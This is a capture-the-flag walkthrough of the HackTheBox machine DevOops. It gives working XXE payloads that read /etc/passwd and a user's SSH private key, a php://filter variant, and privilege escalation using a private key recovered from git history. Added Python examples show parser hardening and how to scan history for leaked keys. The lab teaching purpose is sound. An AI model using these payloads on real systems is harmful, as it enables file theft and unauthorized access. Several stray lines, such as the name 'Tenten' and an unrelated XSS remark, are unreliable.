DevOops

#Linux #Web #Injection #XXE

Tenten is a medium-rated Linux machine from HackTheBox created by Iokori. In the current post, my IP is 10.10.14.76, and the target's IP is 10.129.102.140.

The machine is a good review of concepts. The reconnaissance step is standard and involves fuzzing to find new attack vectors, but it requires a reliable tool to detect the target's technologies, such as Wappalyzer.

Once the correct vector is found, you have to exploit an explicit XXE to extract relevant files and log in as roosa. On the other hand, privilege escalation is a matter of patience: searching a git project and other important files for information to extract the public key.

Recon

Local Terminal
> ping -c 1 10.129.102.140

PING 10.129.102.140 (10.129.102.140) 56(84) bytes of data.
64 bytes from 10.129.102.140: icmp_seq=1 ttl=63 time=273 ms

--- 10.129.102.140 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 273.347/273.347/273.347/0.000 ms

The machine is alive, and from the TTL (close to but not more than 64) it is reasonable to think that the target is a Linux machine.

Local Terminal
nmap -p- -sS --min-rate=5000 -Pn -n -oN AllPorts 10.129.102.140
Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-13 16:24 -03
Warning: 10.129.102.140 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.102.140
Host is up (0.27s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
Local Terminal
nmap -sCV -p 22,5000 10.129.102.140 -oN Target
Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-13 16:26 -03
Nmap scan report for 10.129.102.140
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
|   256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
|_  256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
5000/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two open ports. First, port 22 with SSH: if you search for "OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 launchpad", you can see that the target is an "Ubuntu Xenial".

Port 5000

Local Terminal
> whatweb http://10.129.102.140:5000

http://10.129.102.140:5000 [200 OK] Country[RESERVED][ZZ], 
HTTPServer[gunicorn/19.7.1], IP[10.129.102.140]

Nothing relevant yet.

dev.solita.fi could be a domain, but it's a website outside the machine.

From Wappalyzer we know that the website uses PHP, so a good option is to fuzz with that extension.

Local Terminal
gobuster dir -u http://10.129.102.140:5000 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.102.140:5000
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 200) [Size: 347]
/feed                 (Status: 200) [Size: 546263]

And we found two paths, neither of them with the php extension.

First, upload an empty file to see how it reacts (create it with vi test.xml), then create the proper XML with vi exploit.xml.

test.xml
Testing
exploit.xml
<elements>
        <Author>Tartox</Author>
        <Subject>String</Subject>
        <Content>Stringtwo</Content>
</elements>

From here we got a lot of information. First, the output is visible, which means an XXE is possible; second, there is a user called "roosa" on the system.

Exploitation

Let's see if the exploit works: create a file with vi exploit_proof.xml, then upload it.

exploit_proof.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

Perfect, it works. Remember that with Ctrl+U (view source) you can see the targeted file in a better format.

Now, time to exploit: upload exploit_exec.xml.

exploit_exec.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

On many machines this exploit fails; an alternative in that situation, because the target uses PHP, is to use wrappers such as "php://filter/convert.base64-encode/resource=/var/www/html/index.php" after SYSTEM.
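To show why the reflected output above is enough for an XXE, here is an added example (not the box's own upload handler) in the app's language, Python: the same <elements> document is parsed once by a handler that resolves SYSTEM entities, as the vulnerable app does, and once by a hardened handler that refuses any DOCTYPE. The secret file is a constructed stand-in for /home/roosa/.ssh/id_rsa.

```python
import tempfile
from xml.parsers import expat

# Constructed stand-in for the file the page reads (/home/roosa/.ssh/id_rsa).
SECRET = tempfile.NamedTemporaryFile("w", delete=False, suffix=".key")
SECRET.write("-----BEGIN RSA PRIVATE KEY----- constructed bytes -----END RSA PRIVATE KEY-----")
SECRET.close()

# Same shape as exploit_proof.xml above, pointed at the constructed file.
UPLOAD = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://{SECRET.name}"> ]>
<elements><Author>Tartox</Author><Subject>&xxe;</Subject><Content>String</Content></elements>"""


def handle_upload(xml_text: str, hardened: bool) -> dict:
    """Parse an <elements> upload and return {tag: text}, i.e. what gets reflected."""
    fields, stack = {}, []
    parser = expat.ParserCreate()

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def chars(data):
        if stack:
            fields[stack[-1]] += data

    def external_ref(context, base, system_id, public_id):
        # Vulnerable behaviour: fetch whatever the SYSTEM id names and splice it in,
        # so the file content lands in the reflected <Subject>.
        path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
        with open(path, "rb") as fh:
            parser.ExternalEntityParserCreate(context).Parse(fh.read(), True)
        return 1

    def doctype(name, sysid, pubid, has_internal_subset):
        # Hardened behaviour: an upload never needs a DTD, so refuse it outright.
        raise ValueError("DOCTYPE not allowed in uploaded XML")

    parser.StartElementHandler = start
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = chars
    if hardened:
        parser.StartDoctypeDeclHandler = doctype
    else:
        parser.ExternalEntityRefHandler = external_ref
    try:
        parser.Parse(xml_text, True)
    except ValueError as exc:
        return {"error": str(exc)}
    return fields
```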

Reverse Shell - roosa

Perfect, we can read the id_rsa.

id_rsa
-----BEGIN RSA PRIVATE KEY-----
<...>
-----END RSA PRIVATE KEY-----
Local Terminal
> chmod 600 id_rsa
> ssh -i id_rsa roosa@10.129.102.140

See the content of the "Cross-Site Scripting" exploit, it's the version 4.1.0, it should be that.

Target Terminal [roosa]
roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt
2d8b779192e11e67d6d8f2039338a37f

Privileges Escalation

Target Terminal [roosa]
roosa@devoops:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
# With the adm group you can read the system logs: ls -l /var/log

roosa@devoops:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.4 LTS
Release:        16.04
Codename:       xenial #Nice

roosa@devoops:~$ ls -la
total 156
<...>
drwx------  3 root  root  4096 Mar 26  2021 .dbus
drwxrwxr-x  4 roosa roosa 4096 Mar 26  2021 deploy
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Desktop
-rw-r--r--  1 roosa roosa   25 Mar 21  2018 .dmrc
<...>
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Templates
-r--------  1 roosa roosa   33 Sep 13 15:04 user.txt
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Videos
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 work
<...>

A lot of files, but there are two curious folders, deploy and work. Let's check work.

Target Terminal [roosa]
roosa@devoops:~$ cd work
roosa@devoops:~/work$ ls -la
total 12
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 .
drwxr-xr-x 22 roosa roosa 4096 Sep 23  2022 ..
drwxrwx---  5 roosa roosa 4096 Mar 26  2021 blogfeed

roosa@devoops:~/work$ cd blogfeed
roosa@devoops:~/work/blogfeed$ ls -la
total 28
drwxrwx--- 5 roosa roosa 4096 Mar 26  2021 .
drwxrwxr-x 3 roosa roosa 4096 Mar 26  2021 ..
drwxrwx--- 8 roosa roosa 4096 Mar 26  2021 .git
-rw-rw---- 1 roosa roosa  104 Mar 19  2018 README.md
drwxrwx--- 3 roosa roosa 4096 Mar 26  2021 resources
-rwxrw-r-- 1 roosa roosa  180 Mar 21  2018 run-gunicorn.sh
drwxrwx--- 2 roosa roosa 4096 Mar 26  2021 src

Good, there is git; in those cases it is always good practice to check the commits for old relevant information... ALWAYS! But first, let's see if there is another hidden file here.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ find .
.
./run-gunicorn.sh
./resources
./resources/integration
./resources/integration/authcredentials.key
./.git
./.git/objects
./.git/objects/33
./.git/objects/33/e87c312c08735a02fa9c796021a4a3023129ad
<...>

A file with credentials?

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ cat ./resources/integration/authcredentials.key
-----BEGIN RSA PRIVATE KEY-----
<...>
-----END RSA PRIVATE KEY-----

Another id_rsa; go to /home to check for more users.

Another way to see the users with a shell is to read the /etc/passwd file and check who has "bash" available.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ cd /home

roosa@devoops:/home$ ls -la
total 28
drwxr-xr-x  7 root     root     4096 Mar 26  2021 .
drwxr-xr-x 23 root     root     4096 Sep 23  2022 ..
drwxr-xr-x  2 blogfeed blogfeed 4096 Mar 26  2021 blogfeed
drwxr-xr-x  4 git      git      4096 Sep 23  2022 git
drwx------  2 root     root     4096 Mar 26  2021 lost+found
drwxr-xr-x 16 osboxes  osboxes  4096 Mar 26  2021 osboxes
drwxr-xr-x 22 roosa    roosa    4096 Sep 23  2022 roosa

Many users to test the id_rsa against; if it is not the correct one, we should check the past commits for mistakes.

Copy authcredentials.key to the tmp folder as id_rsa, then connect through ssh.

Target Terminal [roosa]
roosa@devoops:/home$ cd /tmp
roosa@devoops:/tmp$ cp /home/roosa/work/blogfeed/resources/integration/authcredentials.key /tmp/id_rsa
roosa@devoops:/tmp$ chmod 600 id_rsa
roosa@devoops:/tmp$ ssh -i id_rsa root@localhost
    # It asks for a password with every user, forget about it.

Return to the blogfeed folder with cd /home/roosa/work/blogfeed

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ git log

"reverted accidental commit with proper key" looks like an interesting mistake; copy the commit hash.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ git log -p 33e87c312c08735a02fa9c796021a4a3023129ad

It shows a deleted id_rsa; copy the red (removed) lines to /tmp as id_rsa_two and try to use it.

id_rsa_two
-----BEGIN RSA PRIVATE KEY-----
<...>
-----END RSA PRIVATE KEY-----
Target Terminal [roosa]
roosa@devoops:/tmp$ chmod 600 id_rsa_two
roosa@devoops:/tmp$ ssh -i id_rsa_two root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Sep 23 09:46:30 2022
root@devoops:~# cat root.txt

And it works, the machine is done.
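The git log -p step above is exactly what a repository audit should automate: a key that was "reverted" in a later commit is still present in history. The following is an added example, not code from the box or its blogfeed project, that scans `git log -p --all` text for private-key lines a commit added or removed; the sample log is constructed in the shape of the blogfeed history, reusing the page's commit id and placeholder lines instead of real key bodies.

```python
import re

BEGIN_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
END_RE = re.compile(r"-----END [A-Z ]*PRIVATE KEY-----")
DIFF_RE = re.compile(r"^diff --git a/(\S+) b/")


def find_key_material(log_text: str) -> dict:
    """Map (commit, path, '+' or '-') to the number of key body lines that commit added or removed."""
    hits, commit, path, in_key = {}, None, None, False
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit, path, in_key = line.split()[1], None, False
            continue
        m = DIFF_RE.match(line)
        if m:
            path, in_key = m.group(1), False
            continue
        # Only hunk lines count: message lines come before any diff header, and
        # '@@', 'index' or '\ No newline' lines carry no '+', '-' or ' ' prefix.
        if not line or path is None or line[0] not in "+- ":
            continue
        sign, body = line[0], line[1:]
        if BEGIN_RE.search(body):
            in_key = True
        elif END_RE.search(body):
            in_key = False
        elif in_key and sign != " ":
            hits[(commit, path, sign)] = hits.get((commit, path, sign), 0) + 1
    return hits

# Constructed log in the shape of the blogfeed history: the page's commit id,
# and two placeholder lines standing in for each key body.
SAMPLE_LOG = """\
commit 33e87c312c08735a02fa9c796021a4a3023129ad

    reverted accidental commit with proper key

diff --git a/resources/integration/authcredentials.key b/resources/integration/authcredentials.key
--- a/resources/integration/authcredentials.key
+++ b/resources/integration/authcredentials.key
@@ -1,4 +1,4 @@
 -----BEGIN RSA PRIVATE KEY-----
-OLDKEYBODYLINE1placeholder
-OLDKEYBODYLINE2placeholder
+NEWKEYBODYLINE1placeholder
+NEWKEYBODYLINE2placeholder
 -----END RSA PRIVATE KEY-----
"""
```

Any '-' entry in the result means the old key is still recoverable from history and must be treated as compromised, no matter what the current tree contains.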
